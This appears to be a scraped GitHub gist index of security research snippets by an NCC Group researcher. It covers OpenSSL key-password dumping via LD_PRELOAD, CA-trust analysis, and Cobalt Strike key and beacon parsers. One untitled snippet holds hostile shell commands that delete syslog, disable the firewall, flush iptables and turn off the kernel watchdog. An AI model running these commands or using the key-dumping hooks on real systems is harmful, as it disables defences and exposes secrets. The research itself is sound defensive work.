
olliencc / dumpprivatekeypassword.c
Created June 2, 2015 18:15
dump the password used by an OpenSSL client for its private key, using LD_PRELOAD and hooking the callback registration functions
//
// based on https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/
// Licensed under the terms of GPLv3 (or any later version) at your choice
//
// works for daemons which can be run in the foreground
//
// gcc nccsslpasswdlog.c -shared -o nccsslpasswdlog.so -fPIC -ldl
//
//
olliencc / nccsslkeyandcertlog.c
Last active August 29, 2015 14:22
dump the certificate and private key in PEM format when used
//
// based on https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/
// Licensed under the terms of GPLv3 (or any later version) at your choice
//
// works for daemons which can be run in the foreground
//
// gcc nccsslkeyandcertlog.c -shared -o nccsslkeyandcertlog.so -fPIC -ldl
//
//
olliencc / whodoineedtotrust.go
Created January 2, 2016 21:16
Understand which CAs you need to trust for the Alexa top million
/*
Understand which CAs you need to trust for the Alexa top million
Released as open source by NCC Group Plc - http://www.nccgroup.trust/
Developed by Ollie Whitehouse, ollie dot whitehouse at nccgroup dot trust
Released under AGPL
olliencc / PEDumpHelpScanner.py
Created April 12, 2019 20:21
How to scan for Windows binaries with the MINIDUMP_AUXILIARY_PROVIDER resource section
#
# Ollie Whitehouse
# ollie.whitehouse [@] nccgroup.com
#
import os
import pefile
rootdirs = [
#"C:/Data/NCC/!Research/DUMPHELPER/test/t/"
using System;
using System.Net.Http;
using System.Runtime.CompilerServices;
using System.Text;
using System.Threading.Tasks;
using Newtonsoft.Json;
using MessageCardModel;
using System.Collections.Generic;
using System.IO;
using MessageCardModel.Actions;
/bin/sh
ulimit -n 65535
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
echo "nope" >/tmp/log_rot
sudo sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
olliencc / Dump.java
Created June 15, 2020 10:22
Dump keys from Cobalt Strike server
import java.io.File;
import java.util.Base64;
import common.CommonUtils;
import java.security.KeyPair;
class DumpKeys
{
public static void main(String[] args)
{
try {
olliencc / beacon-metadata.py
Created June 15, 2020 10:24
Parse CobaltStrike beacon metadata
import M2Crypto
import requests
# PEM envelopes for the beacon key pair; the `{}` slot is where the base64 key body
# goes (presumably filled via str.format — confirm against the callers).
PRIVATE_KEY_TEMPLATE = "-----BEGIN PRIVATE KEY-----\n{}\n-----END PRIVATE KEY-----"
PUBLIC_KEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----"
class Metadata(object):
"""
Class to represent a beacon Metadata object
"""
olliencc / beacon-aes.py
Created June 15, 2020 10:25
CobaltStrike Beacon AES encryption
import hashlib
import hmac
import binascii
import base64
import sys
import struct
from Crypto.Cipher import AES
# Hash function used for the message signature; SIG_SIZE is its digest length
# in bytes (32 for SHA-256), derived from the algorithm rather than hard-coded.
HASH_ALGO = hashlib.sha256
SIG_SIZE = len(HASH_ALGO().digest())
olliencc / aes-parser.py
Created June 15, 2020 10:26
Parse AES tasks from CobaltStrike Beacon
# NOTE: insert decryption functions
if __name__ == "__main__":
SHARED_KEY = binascii.unhexlify("bca4caea1b3172aa979a5eac6c813184")
HMAC_KEY = binascii.unhexlify("94b64efcf87b13c6828bcf14373bb2f9")
with open(sys.argv[1], 'rb') as f:
enc_data = f.read()
encrypted_data, data_length = readInt(enc_data)
print "Encrypted data should be: %d" % data_length
signature = encrypted_data[-16:]